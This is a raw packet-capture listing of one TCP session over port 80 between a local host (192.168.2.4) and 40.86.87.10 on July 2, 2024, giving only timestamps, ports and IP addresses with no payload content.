Jul 2, 2024 07:31:13.484477043 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.484491110 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.484499931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.484513044 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.484518051 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.484524965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.484546900 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.484565973 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.484570026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.484612942 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.486843109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.486888885 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.486891985 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.486901999 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.486929893 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.486953974 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.486975908 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.486987114 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.486998081 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.487014055 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.487035990 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.511482000 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.511492968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.511507034 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.511538029 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.511574984 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.511646986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.511658907 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.511676073 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.511687040 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.511693001 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.511703014 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.511720896 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.511746883 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.511755943 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.511801004 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.511828899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.511838913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.511850119 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.511857986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.511868954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.511874914 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.511902094 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.511924028 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.512089014 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.512100935 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.512110949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.512120962 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.512131929 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.512131929 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.512144089 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.512154102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.512161970 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.512190104 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.517733097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.517776012 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.517781019 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.517787933 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.517812967 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.517833948 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.517919064 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.517930984 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.517942905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.517954111 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.517966032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.517972946 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.517988920 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.518021107 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.518093109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.518136978 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.518174887 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.518184900 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.518196106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.518205881 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.518212080 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.518217087 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.518227100 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.518229961 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.518258095 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.518266916 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.518438101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.518449068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.518487930 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.518510103 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.518522024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.518531084 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.518542051 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.518552065 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.518556118 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.518599987 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.518848896 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.518861055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.518871069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.518903971 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.518919945 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.518987894 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.518999100 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.519010067 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.519021034 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.519032955 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.519035101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.519054890 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.519077063 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.552306890 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.552325010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.552336931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.552370071 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.552386045 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.552464962 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.552476883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.552496910 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.552509069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.552512884 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.552550077 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.552691936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.552702904 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.552712917 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.552723885 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.552735090 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.552738905 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.552745104 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.552757978 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.552777052 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.552802086 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.642745972 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.647630930 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.061768055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.061806917 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.061820030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.061858892 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.061870098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.061877012 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.061887980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.061893940 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.061928988 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.062026024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.062036991 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.062077045 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.062088013 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.062130928 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.149317980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.149348021 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.149355888 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.149400949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.149410963 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.149415970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.149419069 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.149468899 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.149816036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.149861097 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.149873018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.149883986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.149913073 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.149934053 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.149966002 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.149977922 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.150028944 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.150095940 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.150105953 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.150145054 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.150192022 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.150201082 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.150209904 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.150218964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.150228024 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.150262117 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.150358915 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.150402069 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.150417089 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.150425911 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.150458097 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.150531054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.150540113 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.150556087 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.150563955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.150566101 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.150595903 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.150619030 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.150623083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.150633097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.150670052 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.150758982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.150768995 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.150779009 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.150799036 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.150836945 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.272037983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272051096 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272061110 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272115946 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.272167921 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.272330999 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272367954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272378922 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272389889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272399902 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272409916 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272413969 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.272420883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272444963 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.272469044 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.272526026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272537947 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272550106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272561073 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272571087 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272578001 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.272599936 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.272615910 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.272802114 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272813082 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272823095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272828102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272838116 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272849083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272859097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272866011 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.272869110 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272881985 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272893906 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.272897005 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.272916079 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.272927999 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.273180962 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.273341894 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.273353100 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.273364067 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.273374081 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.273382902 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.273386955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.273396015 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.273406029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.273415089 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.273417950 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.273427963 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.273437977 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.273438931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.273449898 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.273452044 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.273478031 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.273489952 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.273794889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.273803949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.273814917 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.273827076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.273837090 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.273838043 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.273849010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.273864985 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.273880959 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.274039030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.274048090 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.274058104 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.274069071 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.274080038 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.274085045 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.274090052 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.274102926 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.274122000 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.274147034 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.274276972 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.274290085 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.274301052 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.274312973 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.274317026 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.274334908 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.274364948 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.396378994 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.396447897 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.396641970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.396651983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.396661997 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.396672010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.396682024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.396692991 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.396694899 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.396723032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.396733046 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.396743059 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.396744967 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.396753073 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.396761894 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.396790981 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.396945953 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.396955967 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.396965981 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.396972895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.396982908 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.396989107 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.396994114 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.397003889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.397012949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.397022009 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.397022963 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.397036076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.397041082 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.397069931 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.397083998 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.397387028 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.397404909 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.397414923 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.397423983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.397434950 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.397448063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.397452116 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.397458076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.397483110 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.397507906 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.397897005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.397927999 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.397936106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.397945881 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.397955894 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.397964954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.397974968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.397984028 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.397984028 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.397995949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.397996902 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.398005009 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398015022 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398019075 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.398025036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398032904 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.398035049 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398045063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398055077 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398063898 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.398063898 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398075104 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398082972 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:14.398082972 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:14.398108006 CEST	49730	80	192.168.2.4	40.86.87.10
